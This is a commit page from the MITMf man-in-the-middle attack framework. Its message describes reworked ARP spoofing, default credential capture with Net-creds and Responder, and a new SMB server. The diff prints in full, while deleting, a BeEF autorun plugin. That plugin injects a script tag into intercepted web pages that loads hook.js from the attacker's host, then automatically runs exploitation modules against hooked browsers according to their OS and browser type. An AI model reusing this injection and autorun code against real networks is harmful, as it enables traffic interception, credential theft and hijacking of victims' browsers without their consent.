This is 1/2 of the work done... lot's of cool stuff!

I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
2025-07-07 13:32:18 -07:00 · 2015-04-27 18:33:55 +02:00 · 2015-04-27 18:33:55 +02:00 · 9712eed4a3
commit 9712eed4a3
parent 663f38e732
92 changed files with 6883 additions and 3349 deletions
--- a/plugins/BeefAutorun.py
+++ b/plugins/BeefAutorun.py
@ -1,131 +0,0 @@
-#!/usr/bin/env python2.7
-
-# Copyright (c) 2014-2016 Marcello Salvati
-#
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License as
-# published by the Free Software Foundation; either version 3 of the
-# License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
-# USA
-#
-
-import logging
-import sys
-import json
-import threading
-
-from core.beefapi.beefapi import BeefAPI
-from core.configwatcher import ConfigWatcher
-from core.utils import SystemConfig
-from plugins.plugin import Plugin
-from plugins.Inject import Inject
-from time import sleep
-
-mitmf_logger = logging.getLogger('mitmf')
-
-class BeefAutorun(Inject, Plugin, ConfigWatcher):
-	name        = "BeEFAutorun"
-	optname     = "beefauto"
-	desc        = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
-	tree_output = []
-	depends     = ["Inject"]
-	version     = "0.3"
-	has_opts    = False
-
-	def initialize(self, options):
-		self.options    = options
-		self.ip_address = SystemConfig.getIP(options.interface)
-
-		Inject.initialize(self, options)
-
-		self.onConfigChange()
-
-		t = threading.Thread(name="autorun", target=self.autorun, args=())
-		t.setDaemon(True)
-		t.start()
-
-	def onConfigChange(self):
-
-		beefconfig = self.config['MITMf']['BeEF']
-
-		self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
-
-		self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
-		if not self.beef.login(beefconfig['user'], beefconfig['pass']):
-			sys.exit("[-] Error logging in to BeEF!")
-
-		self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
-
-	def autorun(self):
-		already_ran    = []
-		already_hooked = []
-
-		while True:
-			mode = self.config['BeEFAutorun']['mode']
-			sessions = self.beef.sessions_online()
-			if (sessions is not None and len(sessions) > 0):
-				for session in sessions:
-
-					if session not in already_hooked:
-						info = self.beef.hook_info(session)
-						mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
-						already_hooked.append(session)
-						self.black_ips.append(str(info['ip']))
-
-					if mode == 'oneshot':
-						if session not in already_ran:
-							self.execModules(session)
-							already_ran.append(session)
-
-					elif mode == 'loop':
-						self.execModules(session)
-						sleep(10)
-
-			else:
-				sleep(1)
-
-	def execModules(self, session):
-		session_info     = self.beef.hook_info(session)
-		session_ip       = session_info['ip']
-		hook_browser     = session_info['name']
-		hook_os          = session_info['os']
-		all_modules      = self.config['BeEFAutorun']["ALL"]
-		targeted_modules = self.config['BeEFAutorun']["targets"]
-
-		if len(all_modules) > 0:
-			mitmf_logger.info("{} >> sending generic modules".format(session_ip))
-			for module, options in all_modules.iteritems():
-				mod_id = self.beef.module_id(module)
-				resp = self.beef.module_run(session, mod_id, json.loads(options))
-				if resp["success"] == 'true':
-					mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
-				else:
-					mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
-				sleep(0.5)
-
-		mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
-		for os in targeted_modules:
-			if (os in hook_os) or (os == hook_os):
-				browsers = targeted_modules[os]
-				if len(browsers) > 0:
-					for browser in browsers:
-						if browser == hook_browser:
-							modules = targeted_modules[os][browser]
-							if len(modules) > 0:
-								for module, options in modules.iteritems():
-									mod_id = self.beef.module_id(module)
-									resp = self.beef.module_run(session, mod_id, json.loads(options))
-									if resp["success"] == 'true':
-										mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
-									else:
-										mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
-									sleep(0.5)